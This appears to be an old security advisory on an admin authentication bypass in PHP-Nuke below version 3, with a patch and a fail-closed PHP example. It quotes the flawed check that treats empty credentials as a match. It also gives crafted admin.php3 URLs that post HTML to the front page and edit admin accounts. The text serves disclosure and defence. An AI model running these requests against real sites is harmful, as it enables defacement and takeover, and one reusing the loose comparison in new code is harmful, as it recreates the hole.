COMMAND

    PHP-Nuke

SYSTEMS AFFECTED

    all sites using PHP-Nuke, versions below 3

PROBLEM

    Gandalf Elbrujo found the following.  PHP-Nuke is a web portal system:
    storytelling software and an automated web site for distributing news
    and articles, with a user system.

    The problem is that when somebody requests

        http://example.com/admin.php3?admin=whatever

    they get full access as an admin, which means posting news and
    everything else the actual administrator can do.

    So, let's see why this is possible.  The file auth.inc.php3, which is
    used to authenticate the admin:

        <----snip---->
        if(isset($admin)) {
          if(!IsSet($mainfile)) { include("mainfile.php3"); }
          $admin = base64_decode($admin);   // with admin=whatever, $admin becomes null here
          $admin = explode(":", $admin);
          $aid = "$admin[0]";               // so $aid ...
          $pwd = "$admin[1]";               // ... and $pwd are both null as well
        <---snip--->
          $result=mysql_query("select pwd from authors where aid='$aid'");
          // this becomes: select pwd from authors where aid=''; which returns nothing
        <--snip--->
          } else {
            list($pass)=mysql_fetch_row($result);   // $pass gets null here
            if($pass == $pwd) {                     // so this translates to NULL == NULL
              $admintest = 1;                       // bingo! we're admin now!
            }
        <---snip--->

    Starman Jones added the following.  The above example lets you log in
    as the administrator, but you cannot do anything with that URL alone:
    when you click on anything in the administrator's control panel you
    are asked for a username and password.  Starman has found a way to
    bypass this.

        http://www.example.com/admin.php3?admin=anything&op=PostAdminStory&introtext=evil%20hacker%20message

    The above example lets you post a topic on the main page as an
    administrator.  You can add HTML tags to it, and a topic.  To
    separate the words of the text you want to display, use '%20'
    (without the quotes).  You could also put HTML in the message and
    make the whole front page redirect to some other page.  Anyway, you
    get the idea.

    You can also edit the existing admin accounts by doing:

        http://www.example.com/admin.php3?admin=anything&op=mod_authors

    With &op= set to whatever is in the administration menu, you can
    control everything it lets you.

SOLUTION

    The author added a fix to the latest version, which came out days
    ago.  For those who do not want to download the latest version from

        http://www.ncc.org.ve/php-nuke.php3

    here is a quick fix: in file auth.inc.php3, at line 37, add

         if($aid=="" || $pwd=="") exit;
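
    The same check written to fail closed, as an added example (not
    PHP-Nuke's own code): it rejects the empty and garbage cases the
    snippet above walks through, treats an empty query result as a
    failure instead of a NULL == NULL match, and compares the password
    strictly.  The $authors array, the admin_lookup() stub and the use of
    a password hash instead of the plaintext pwd column are assumptions
    made for the example.

```php
<?php
// Added example (not PHP-Nuke code): a fail-closed replacement for the
// admin check in auth.inc.php3 above. The database is stubbed with a
// constructed array so it runs without MySQL.

// Constructed stand-in for the "authors" table ("select pwd from authors
// where aid=..."); stores a password hash instead of the plaintext pwd.
$authors = ['example_admin' => password_hash('example-pass', PASSWORD_DEFAULT)];

function admin_lookup(array $authors, string $aid): ?string {
    return $authors[$aid] ?? null;      // null when no such row exists
}

// True only when $admin decodes to "aid:pwd" with non-empty aid and pwd,
// an existing author row and a matching password; false in every other case.
function admin_authenticated(array $authors, ?string $admin): bool {
    if ($admin === null || $admin === '') {
        return false;                   // no ?admin= value at all
    }
    // Strict mode rejects input outside the base64 alphabet or with bad
    // padding; whatever survives must still split into two non-empty fields.
    $decoded = base64_decode($admin, true);
    if ($decoded === false) {
        return false;
    }
    $parts = explode(':', $decoded, 2);
    if (count($parts) !== 2 || $parts[0] === '' || $parts[1] === '') {
        return false;                   // the page's bug: $aid and $pwd empty
    }
    [$aid, $pwd] = $parts;
    $stored = admin_lookup($authors, $aid);
    if ($stored === null) {
        return false;                   // empty result: fail closed, not NULL == NULL
    }
    // Constant-time hash check replaces the loose "$pass == $pwd".
    return password_verify($pwd, $stored);
}

// The page's bypass value and two malformed cookies must all be rejected;
// only a well-formed aid:pwd for a real author with the right password passes.
var_dump(admin_authenticated($authors, 'whatever'));
var_dump(admin_authenticated($authors, base64_encode(':')));
var_dump(admin_authenticated($authors, base64_encode('nosuch:x')));
var_dump(admin_authenticated($authors, base64_encode('example_admin:example-pass')));
```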

    The patch for the bug reported by Starman is available at:

        http://www.ncc.org.we/php-nuke.php3?op=download&location=http://download.sourceforge.net/phpnuke&file=PHP-Nuke-3.0.tar.gz